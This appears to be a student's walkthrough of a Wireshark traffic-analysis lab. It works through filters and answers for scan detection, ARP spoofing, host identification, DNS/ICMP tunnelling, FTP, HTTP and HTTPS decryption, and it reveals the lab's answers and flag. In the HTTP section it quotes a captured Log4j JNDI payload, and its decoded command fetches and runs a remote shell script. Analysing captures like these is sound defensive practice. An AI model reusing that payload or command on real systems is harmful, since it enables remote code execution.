WIRESHARK: TRAFFIC ANALYSIS

NMAP SCANS

Use the "Desktop/exercise-pcaps/nmap/Exercise.pcapng" file. What is the total number of the "TCP Connect" scans?

root@dco:~$ Wireshark
WireShark > File > Open > Desktop/exercise-pcaps/nmap/Exercise.pcapng

#step 1: get an overview 
WireShark
 Filter: tcp.flags.syn==1 and tcp.flags.ack==0 and tcp.window_size > 1024
 
WireShark > status bar
  * Packets: 6544 Displayed: 1000 (15.3%)

Use the "Desktop/exercise-pcaps/nmap/Exercise.pcapng" file. Which scan type is used to scan the TCP port 80?

root@dco:~$ Wireshark
WireShark > File > Open > Desktop/exercise-pcaps/nmap/Exercise.pcapng

#step 1: get an overview 
WireShark
 Filter: tcp.port==80
  SYN, SYN/ACK, ACK
 
 * sort the packet list window by "time" in ascending order

Use the "Desktop/exercise-pcaps/nmap/Exercise.pcapng" file. How many "UDP close port" messages are there?

root@dco:~$ Wireshark
WireShark > File > Open > Desktop/exercise-pcaps/nmap/Exercise.pcapng

#step 1: get an overview 
WireShark
 Filter: ticmp.type==3 and icmp.code==3
 
WireShark > status bar
  * Packets: 6544 Displayed: 1083 (16.5%)

Use the "Desktop/exercise-pcaps/nmap/Exercise.pcapng" file. Which UDP port in the 55-70 port range is open?

root@dco:~$ Wireshark
WireShark > File > Open > Desktop/exercise-pcaps/nmap/Exercise.pcapng

#step 1: get an overview 
WireShark
 Filter: (udp.dstport >= 55 && udp.dstport <=70) && !(icmp.code == 3)
 Output: 67 Destination Unreachable/Port Unreachable
 Output: 69 Destination Unreachable/Port Unreachable
 Output: 68
  - must sort the "info" column IOT see that 67 & 69 were unreachable

ARP POISONING & MITM

Use the "Desktop/exercise-pcaps/arp/Exercise.pcapng" file. What is the number of ARP requests crafted by the attacker?

root@dco:~$ Wireshark
WireShark > File > Open > Desktop/exercise-pcaps/arp/Exercise.pcapng

#step 1: get an overview 
WireShark
 Filter: arp.opcode == 1 && eth.src == 00:0c:29:e2:18:b4
 
WireShark > status bar
  * Packets: 2866 Displayed: 284 (9.9%)

Use the "Desktop/exercise-pcaps/arp/Exercise.pcapng" file. What is the number of HTTP packets received by the attacker?

root@dco:~$ Wireshark
WireShark > File > Open > Desktop/exercise-pcaps/arp/Exercise.pcapng

#step 1: get an overview 
WireShark
 Filter: http && eth.dst == 00:0c:29:e2:18:b4
 
WireShark > status bar
  * Packets: 2866 Displayed: 90 (3.1%)

Use the "Desktop/exercise-pcaps/arp/Exercise.pcapng" file. What is the number of sniffed username&password entries?

root@dco:~$ Wireshark
WireShark > File > Open > Desktop/exercise-pcaps/arp/Exercise.pcapng

#step 1: get an overview 
WireShark
 Filter: ((http && eth.dst == 00:0c:29:e2:18:b4) && (http.request.uri == "/userinfo.php")) && (urlencoded-form.key == "uname")
 
WireShark > status bar
 * Packets: 2866 Displayed: 6 (0.2%)
  
 * find the specific key/value (uname) in packet details then select
   "apply as filter" "...and selected"

Use the "Desktop/exercise-pcaps/arp/Exercise.pcapng" file. What is the password of the "Client986"?

root@dco:~$ Wireshark
WireShark > File > Open > Desktop/exercise-pcaps/arp/Exercise.pcapng

#step 1: get an overview 
WireShark
 Filter: (((http && eth.dst == 00:0c:29:e2:18:b4) && (http.request.uri == "/userinfo.php")) && (urlencoded-form.key == "uname")) && (urlencoded-form.value == "client986")
  CTRL+F:
  Packet: Packet Details
  Type: Narrow & Wide
  Case sensitive: disabled
  Search Type: String
  Search: Client354
  
 * clientnothere!
 
 * find the specific key/value (client986) in packet details then select
   "apply as filter" "...and selected"

Use the "Desktop/exercise-pcaps/arp/Exercise.pcapng" file. What is the comment provided by the "Client354"?

root@dco:~$ Wireshark
WireShark > File > Open > Desktop/exercise-pcaps/arp/Exercise.pcapng

#step 1: get an overview 
WireShark
 Filter: ((http && eth.dst == 00:0c:29:e2:18:b4))
 CTRL+F:
  Packet: Packet Details
  Type: Narrow & Wide
  Case sensitive: disabled
  Search Type: String
  Search: Client354
 
 * Nice Work!

IDENTIFYING HOSTS | DHCP, NETBIOS & KERBEROS

Use the "Desktop/exercise-pcaps/dhcp-netbios-kerberos/dhcp-netbios.pcap" file. What is the MAC address of the host "Galaxy A30"?

root@dco:~$ Wireshark
WireShark > File > Open > Desktop/exercise-pcaps/dhcp-netbios-kerberos/dhcp-netbios.pcap

#step 1: get an overview 
WireShark
 Filter: dhcp
  Packet Details > DHCP > Option: (12) Host Name
  ...
  
#step 2: expand the filter
 Filter: lower(dhcp.option.hostname) contains "a30"
 ...
  Packet Details > DHCP > Option: (61) Client Identifier
  Client MAC Addres > Copy > Value
   9a:81:41:cb:96:6c

Use the "Desktop/exercise-pcaps/dhcp-netbios-kerberos/dhcp-netbios.pcap" file. How many NetBIOS registration requests does the "LIVALJM" workstation have?

root@dco:~$ Wireshark
WireShark > File > Open > Desktop/exercise-pcaps/dhcp-netbios-kerberos/dhcp-netbios.pcap

WireShark > Analyze > Display Filter Expression
 Search: nbns
  Field Name: NBNS > nbns.name
  Relation: contains
  Value: n/a
  
  Filter: nbns.name contains "ALJM"
  
  * revise and improve the original filter
  
WireShark > Packet List > packet > Packet Details > NBNS > Flags > right-click ... = Opcode: Registration (5) > Apply as Filter > ...And Selected
 
 Filter: (nbns.name contains "ALJM") && (nbns.flags.opcode == 5)
 
  * Packets: 1800000 Displayed: 16 (0.0%)

Use the "Desktop/exercise-pcaps/dhcp-netbios-kerberos/dhcp-netbios.pcap" file. Which host requested the IP address "172.16.13.85"?

root@dco:~$ Wireshark
WireShark > File > Open > Desktop/exercise-pcaps/dhcp-netbios-kerberos/dhcp-netbios.pcap

WireShark > Analyze > Display Filter Expression
 Search: requested
  Field Name: DHCP/BOOTP > dhcp.option.requested_ip_address
  Relation: ==
  Value: 172.16.13.85
  
  Filter: dhcp.option.requested_ip_address == 172.16.13.85
  
  * revise and improve the original filter
  
WireShark > Packet List > packet > Packet Details > DHCP > DHCP (Request) > right-click option (12) > right-click Host Name > Copy > Value
 Galaxy-A12

Use the "Desktop/exercise-pcaps/dhcp-netbios-kerberos/kerberos.pcap" file. What is the IP address of the user "u5"? (Enter the address in defanged format.)

root@dco:~$ Wireshark
WireShark > File > Open > Desktop/exercise-pcaps/dhcp-netbios-kerberos/kerberos.pcap

WireShark > Analyze > Display Filter Expression
 Search: cnamestring
  Field Name: KRB5 > kerberos.CNameString
  Relation: contains
  Value: u5
  
  Filter: kerberos.CNameString contains "u5"
  
  * revise and improve the original filter
  
WireShark > Packet List > packet > Packet Details > Kerberos > req-body > cname > cname-string > u5

 * this verifies that you are identifying the correct packet
 
WireShark > Packet Details > IPv4 > Src > Copy > Value
 Internet Protocol Version 4, Src: 10.1.12.2, Dst: 10.5.3.1

Use the "Desktop/exercise-pcaps/dhcp-netbios-kerberos/kerberos.pcap" file. What is the hostname of the available host in the Kerberos packets?

root@dco:~$ Wireshark
WireShark > File > Open > Desktop/exercise-pcaps/dhcp-netbios-kerberos/kerberos.pcap

WireShark > Analyze > Display Filter Expression
 Search: cnamestring
  Field Name: KRB5 > kerberos.CNameString
  Relation: contains
  Value: $
  
  Filter: kerberos.CNameString contains "$"
  
  * Some packets could provide hostname information in this field. To avoid 
    this confusion, filter the "$" value. The values end with "$" are 
    hostnames, and the ones without it are user names.
  
WireShark > Packet List > packet > Packet Details > Kerberos > tgs-rep > cname > right-click cname-string > Copy > Value
 xp1$

TUNNELING TRAFFIC: DNS & ICMP

Use the "Desktop/exercise-pcaps/dns-icmp/icmp-tunnel.pcap" file. Investigate the anomalous packets. Which protocol is used in ICMP tunnelling?

root@dco:~$ Wireshark
WireShark > File > Open > Desktop/exercise-pcaps/dns-icmp/icmp-tunnel.pcap

#step 1: get an overview 
WireShark
 Filter: icmp
 
#anomalous
WireShark > icmp && data.len > 64
 * normal ICMP packet are 64-bytes in size. anything more than this number could be 
   a sign of tunneling
   
Wireshark 
 Filter: icmp && data.len > 64 and (icmp contains "ssh" or icmp contains "ftp" or icmp contains "tcp" or icmp contains "http")
  45000304398640004006e7ad0a5f01020a5f01010016c88b0e1bc373317d578a80180228876f00000101080a006d8653006d6af2000002bc0a2100000115000000077373682d72736100000001230000010100aaf6ef3e7b35837e944717e968fc75b0d4d3447d6602036873dfd40002ab9c668b5b0fde9f8f01b4924ab077bd82a921640990e730e2f8f989e26809b9a8b141825a6c6c92fc3d9c317693148df73b2936b77d4a200ba5cf7acb94bbc042ed544cb761bd44c973d6315f83f6363cb7661f4abe83b464d61d75a891ab105a070848d946456e6e1a5c92b7e1341a0f60c108e7c8f15c2260b6319050fbc6e823cf184f4d8d07827195fa3bcfea14d2db583b9d54cd9dfdd24cfe2c6a42fe8857e3af2270fd04ddbd4f547782e5d6fd95432499e22801a93dfb4a56ab6599abeff08223a72624ceb8f87390b18f91e05bcacbbd3dd9fef5532e3d16573f12b73e91000000800f4b0e4dea70b6aa5c38f7e15fe1fefb55a044289798edd4d5b85dd9808c80b1127e5e9228f59a716357d8bdc5e5aba2553be94592a555ce0d5367e13b7e8aa8a413bca1e66244d701ce32922346850f60ea3dc616e556a5f61e725f94a4d16053063775bc881783de5a433a39aa4bb035f6535f558bc4f18c8ee01f2b53a7d10000010f000000077373682d7273610000010081e7654135bbb3925d206bdd74347f14be34a598a7cd61bcced3eace8363110990e6d8f17488956366501e84fac68dccdd962a7056227fe432e40c43a3d283da0d1ee139d85c6081beb9760978cc75ac37f7f1e4f1994941f5e19bdff2fac585c00b9342d7cabf570cab12a78cf4ad332244ea9ae3fdb92c577d6f7b3fd006e622b56651647a81d3446ad489b847235f75767b876d94a3e854212d5605c9a477f234139145d2bf33e86143fc593706da9e97d1367711f665a87f98d83d089dd7e898d51cbbd941c248f8dda99cf19a06e5f7e9dbdd7f125aa427f2ce992f8062d036e0c9fb36180e92ee5f1da70ff60e972b23cba6812419b0ef92d5a74fd6fc000000000000000000000000000c0a1500000000000000000000
 
   * include protocol commonly used in data exfiltration "ssh", "ftp", "tcp", "http"
      - when the hexadecimal output is converted to ascii, "ssh-rsa" will be shown

Use the "Desktop/exercise-pcaps/dns-icmp/dns.pcap" file. Investigate the anomalous packets. What is the suspicious main domain address that receives anomalous DNS queries? (Enter the address in defanged format.)

root@dco:~$ Wireshark
WireShark > File > Open > Desktop/exercise-pcaps/dns-icmp/dns.pcap

#step 1: get an overview 
WireShark
 Filter: dns
 
#anomalous
WireShark
 Filter: dns.qry.name.len > 15 and !mdns

 * this detects DNS queries with a name length greater than 15 characters, e
   xcluding multicast DNS (mDNS).
   
#pin-point
WireShark > Packet list > Packet Details > DNS > Queries > ... > right-click Name > Apply as Filter > ...And not selected
 ((((dns.qry.name.len > 15 and !mdns) && !(dns.qry.name == "v10.events.data.microsoft.com")) && !(dns.qry.name == "connectivity-check.ubuntu.com")) && !(dns.qry.name == "131.94.168.192.in-addr.arpa")) && !(dns.qry.name == "8.8.8.8.in-addr.arpa")
  A8D603B0DE000000009AF29E902AB216780EAFD10AA3E4A376A2D9165E7809E.2030742EDA1B513BF68DFD675E855A2AA61B2BCE0A7889811D12B34806B9A18.441119E94628EA35FFF9.dataexfil.com
  
  * keep filtering out non pertinent query names

CLEARTEXT PROTOCOL ANALYSIS: FTP

Use the "Desktop/exercise-pcaps/ftp/ftp.pcap" file. How many incorrect login attempts are there?

root@dco:~$ Wireshark
WireShark > File > Open > Desktop/exercise-pcaps/ftp/ftp.pcap

#step 1: get an overview 
WireShark
 Filter: ftp
 
#anomalous
WireShark
 Filter: ftp.response.code == 530
 
WireShark > status bar
 * Packets: 20448 Displayed: 737 (3.6%)

Use the "Desktop/exercise-pcaps/ftp/ftp.pcap" file. What is the size of the file accessed by the "ftp" account?

root@dco:~$ Wireshark
WireShark > File > Open > Desktop/exercise-pcaps/ftp/ftp.pcap

#step 1: get an overview 
WireShark
 Filter: ftp
 
#anomalous
WireShark
 Filter: ftp.response.code == 213
 
WireShark > Packet list > Packet bytes > FTP > 213 > Response Args: 39424

Use the "Desktop/exercise-pcaps/ftp/ftp.pcap" file. The adversary uploaded a document to the FTP server. What is the filename?

root@dco:~$ wireshark &

root@dco:~$ Wireshark
WireShark > File > Open > Desktop/exercise-pcaps/ftp/ftp.pcap

#step 1: get an overview
WireShark
 Filter: ftp
 
#upload/downloaded files
WireShark > ftp.request.command == "STOR" || ftp.request.command == "RETR"

WireShark > Packet List > Packet Details > FTP > RETR > Request Arg > Copy > Value
 * resume.doc

Use the "Desktop/exercise-pcaps/ftp/ftp.pcap" file. The adversary tried to assign special flags to change the executing permissions of the uploaded file. What is the command used by the adversary?

root@dco:~$ wireshark &

root@dco:~$ Wireshark
WireShark > File > Open > Desktop/exercise-pcaps/ftp/ftp.pcap

#step 1: get an overview
WireShark
 Filter: ftp
 
#upload/downloaded files
WireShark > ftp.request.command == "STOR" || ftp.request.command == "RETR"

WireShark > Packet List > right-click packet > Follow > TCP Stream
 ...
 PWD
 257 "/" is current directory.
 TYPE A
 200 Type set to A
 EPSV
 229 Entering Extended Passive Mode (|||35656|)
 LIST
 150 Opening ASCII mode data connection for file list
 226 Transfer complete.
 SITE CHMOD 777 resume.doc
 550 resume.doc: Permission denied
 QUIT
 221 Goodbye.

CLEARTEXT PROTOCOL ANALYSIS: HTTP

Use the "Desktop/exercise-pcaps/http/user-agent.cap" file. Investigate the user agents. What is the number of anomalous "user-agent" types?

root@dco:~$ wireshark &

root@dco:~$ Wireshark
WireShark > File > Open > Desktop/exercise-pcaps/http/user-agent.cap

#step 1: get an overview
WireShark
 Filter: http.user_agent
 
WireShark > Packet List > Packet Details > HTTP > right-click User-Agent > Apply as Column > Sort Ascending
 ${jndi:ldap://45.137.21.9:1389/Basic/Command/Base64/d2dldCBodHRwOi8vNjIuMjEwLjEzMC4yNTAvbGguc2g7Y2htb2QgK3ggbGguc2g7Li9saC5zaA==}
 Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html)
 Wfuzz/2.4
 sqlmap/1.4#stable (http://sqlmap.org)
 Mozilla/5.0 (Windows; U; Windows NT 6.4; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
  - Windows NT 6.4 was never publicly used—it was an early internal version of Windows 10
 Mozlila/5.0 (X11; Ubuntu; Linux x86_64; rv:100.0) Gecko/20100101 Firefox/100.0  

 * count each unique potentially malicious user-agents manually
    - there are six unique user-agents that are anomalous, but one of them is
      a modified user-agent which is Windows NT 6.4; this specific user-agent
      have six occurrences
 
 * be aware that sophisticated APTs or adversaries can modify the user-agent data to match legitimate user-agents used by web browsers

Use the "Desktop/exercise-pcaps/http/user-agent.cap" file. What is the packet number with a subtle spelling difference in the user agent field?

root@dco:~$ wireshark &

root@dco:~$ Wireshark
WireShark > File > Open > Desktop/exercise-pcaps/http/user-agent.cap

#step 1: get an overview
WireShark
 Filter: http.user_agent
 
WireShark > Packet List > Packet Details > HTTP > right-click User-Agent > Apply as Column > Sort Ascending
 ${jndi:ldap://45.137.21.9:1389/Basic/Command/Base64/d2dldCBodHRwOi8vNjIuMjEwLjEzMC4yNTAvbGguc2g7Y2htb2QgK3ggbGguc2g7Li9saC5zaA==}
 Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html)
 Wfuzz/2.4
 sqlmap/1.4#stable (http://sqlmap.org)
 Mozilla/5.0 (Windows; U; Windows NT 6.4; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
  - Windows NT 6.4 was never publicly used—it was an early internal version of Windows 10
 Mozlila/5.0 (X11; Ubuntu; Linux x86_64; rv:100.0) Gecko/20100101 Firefox/100.0
  - 52	-1063550943.144639779	10.10.57.178	44.228.249.3	HTTP	469	Mozlila/5.0 (X11; Ubuntu; Linux x86_64; rv:100.0) Gecko/20100101 Firefox/100.0	GET /categories.php HTTP/1.1 
 * count each unique potentially malicious user-agents manually
    - there are six unique user-agents that are anomalous, but one of them is
      a modified user-agent which is Windows NT 6.4; this specific user-agent
      have six occurrences
 
 * be aware that sophisticated APTs or adversaries can modify the user-agent data to match legitimate user-agents used by web browsers

Use the "Desktop/exercise-pcaps/http/http.pcapng" file. Locate the "Log4j" attack starting phase. What is the packet number?

root@dco:~$ wireshark &

root@dco:~$ Wireshark
WireShark > File > Open > Desktop/exercise-pcaps/http/http.pcapng

#step 1: get an overview
WireShark
 Filter: http.request.method == "POST" && http.user_agent contains $
 
 * 444	3163.829852	45.137.21.9	198.71.247.91	HTTP	447	${jndi:ldap://45.137.21.9:1389/Basic/Command/Base64/d2dldCBodHRwOi8vNjIuMjEwLjEzMC4yNTAvbGguc2g7Y2htb2QgK3ggbGguc2g7Li9saC5zaA==}	POST / HTTP/1.1 
 
 * be aware that sophisticated APTs or adversaries can modify the user-agent data to match legitimate user-agents used by web browsers

Use the "Desktop/exercise-pcaps/http/http.pcapng" file. Locate the "Log4j" attack starting phase and decode the base64 command. What is the IP address contacted by the adversary? (Enter the address in defanged format and exclude "{}".)

root@dco:~$ wireshark &

root@dco:~$ Wireshark
WireShark > File > Open > Desktop/exercise-pcaps/http/http.pcapng

#step 1: get an overview
WireShark
 Filter: http.request.method == "POST" && http.user_agent contains $
 
 * 444	3163.829852	45.137.21.9	198.71.247.91	HTTP	447	${jndi:ldap://45.137.21.9:1389/Basic/Command/Base64/d2dldCBodHRwOi8vNjIuMjEwLjEzMC4yNTAvbGguc2g7Y2htb2QgK3ggbGguc2g7Li9saC5zaA==}	POST / HTTP/1.1 
 
WireShark > Packet List > Packet Details > right-click user-agent > Copy > Value
 ${jndi:ldap://45.137.21.9:1389/Basic/Command/Base64/d2dldCBodHRwOi8vNjIuMjEwLjEzMC4yNTAvbGguc2g7Y2htb2QgK3ggbGguc2g7Li9saC5zaA==}
 
root@dco:~$ cyberchef.io
 input: d2dldCBodHRwOi8vNjIuMjEwLjEzMC4yNTAvbGguc2g7Y2htb2QgK3ggbGguc2g7Li9saC5zaA==
 recipe: From Base64
 recipe: Defang IP Addresses
 output: wget http://62[.]210[.]130[.]250/lh.sh;chmod +x lh.sh;./lh.sh
 
 * be aware that sophisticated APTs or adversaries can modify the user-agent data to match legitimate user-agents used by web browsers

ENCRYPTED PROTOCOL ANALYSIS: DECRYPTING HTTPS

Use the "Desktop/exercise-pcaps/https/Exercise.pcap" file. What is the frame number of the "Client Hello" message sent to "accounts.google.com"?

root@dco:~$ wireshark &

#step 1: get an overview
WireShark
 Filter: (http.request or tls.handshake.type == 1) and !(ssdp) && tls.handshake.extensions_server_name
 
 * the tls.handshake.extensions_server_name filter will limit the output data to only those packets that have SNI field
 
#step 2: 
WireShark > Packet list > Packet Details > TLS > TLSvX.X Record Layer > Handshake Protocol > Extension: server_name > Server Name Indication Extension > right-click "Server Name: ..." > Apply as Column
 16	0.755456	192.168.1.12	172.217.17.237	TLSv1.3	571	accounts.google.com	Client Hello
 
 * visually scan potential malicious domains from the packet list Server Name Column

Use the "Desktop/exercise-pcaps/https/Exercise.pcap" file. Decrypt the traffic with the "KeysLogFile.txt" file. What is the number of HTTP2 packets?

root@dco:~$ wireshark &

WireShark > Edit > Preferences > Protocols > TLS > Transport Layer Security
 (Pre)-Master-Secret log filename: KeyLogFile.txt
 
 * all https traffic can now be decrypted as long as the keylogfile were implemented enterprise-wide
 

#step 1: get an overview
WireShark
 Filter:  http2
 
 * Packets: 1760 Displayed: 115 (6.5%)

Use the "Desktop/exercise-pcaps/https/Exercise.pcap" file. Go to Frame 322. What is the authority header of the HTTP2 packet? (Enter the address in defanged format.)

root@dco:~$ wireshark &

WireShark > Edit > Preferences > Protocols > TLS > Transport Layer Security
 (Pre)-Master-Secret log filename: KeyLogFile.txt
 
 * all https traffic can now be decrypted as long as the keylogfile were implemented enterprise-wide
 
Wireshark > Go > Go to Packet
 Packet No. 322

Wireshark > Packet List > Packet Details > HTTP2 > Header: :Authority
 safebrowsing[.]googleapis[.]com

Use the "Desktop/exercise-pcaps/https/Exercise.pcap" file. Investigate the decrypted packets and find the flag! What is the flag?

root@dco:~$ wireshark &

WireShark > Edit > Preferences > Protocols > TLS > Transport Layer Security
 (Pre)-Master-Secret log filename: KeyLogFile.txt
 
 * all https traffic can now be decrypted as long as the keylogfile were implemented enterprise-wide
 
Wireshark > File > Export Objects > HTTP
 1644 situla.bitbit.net text/plain 3412 bytes 21e2ae0fb85fde7bb246ed90194f601e041b3c8...
 
 * Save & open the file for the flag
    - FLAG{THM-PACKETMASTER}

BONUS: HUNTING CLEARTEXT CREDENTIALS

Use the "Desktop/exercise-pcaps/bonus/Bonus-exercise.pcap" file. What is the packet number of the credentials using "HTTP Basic Auth"?

root@dco:~$ wireshark &

WireShark > File > Open > Desktop/exercise-pcaps/bonus/Bonus-exercise.pcap
WireShark > Tools > Credentials
 Packet No.  Protocol            Username      Additional Info
 237         HTTP Basic Auth     afiiskc

Use the "Desktop/exercise-pcaps/bonus/Bonus-exercise.pcap" file. What is the packet number where "empty password" was submitted?

root@dco:~$ wireshark &

WireShark > File > Open > Desktop/exercise-pcaps/bonus/Bonus-exercise.pcap
WireShark > Tools > Credentials
 Packet No.  Protocol            Username        Additional Info
 170         FTP                 Administrator   Username in packet 136

BONUS: ACTIONABLE RESULTS!

Use the "Desktop/exercise-pcaps/bonus/Bonus-exercise.pcap" file. Select packet number 99. Create a rule for "IPFirewall (ipfw)". What is the rule for "denying source IPv4 address"?

root@dco:~$ wireshark &
WireShark > File > Open > {packetCapture.pcapng}

WireShark > Go > Go to Packet
 Packet No: 99

WireShark > Tools > Firewall ACL Rules
 Create Rule For: IPFirewall (ipfw)
 Inbound: enabled
 Deny: enabled
  add deny ip from 10.121.70.151 to any in

Use the "Desktop/exercise-pcaps/bonus/Bonus-exercise.pcap" file. Select packet number 231. Create "IPFirewall" rules. What is the rule for "allowing destination MAC address"?

root@dco:~$ wireshark &
WireShark > File > Open > {packetCapture.pcapng}

WireShark > Go > Go to Packet
 Packet No: 231

WireShark > Tools > Firewall ACL Rules
 Create Rule For: IPFirewall (ipfw)
 Inbound: enabled
 Deny: disabled
  add allow MAC 00:d0:59:aa:af:80 any in

PreviousWIRESHARK: PACKET OPERATIONS NextTSHARK: THE BASICS

Last updated 3 months ago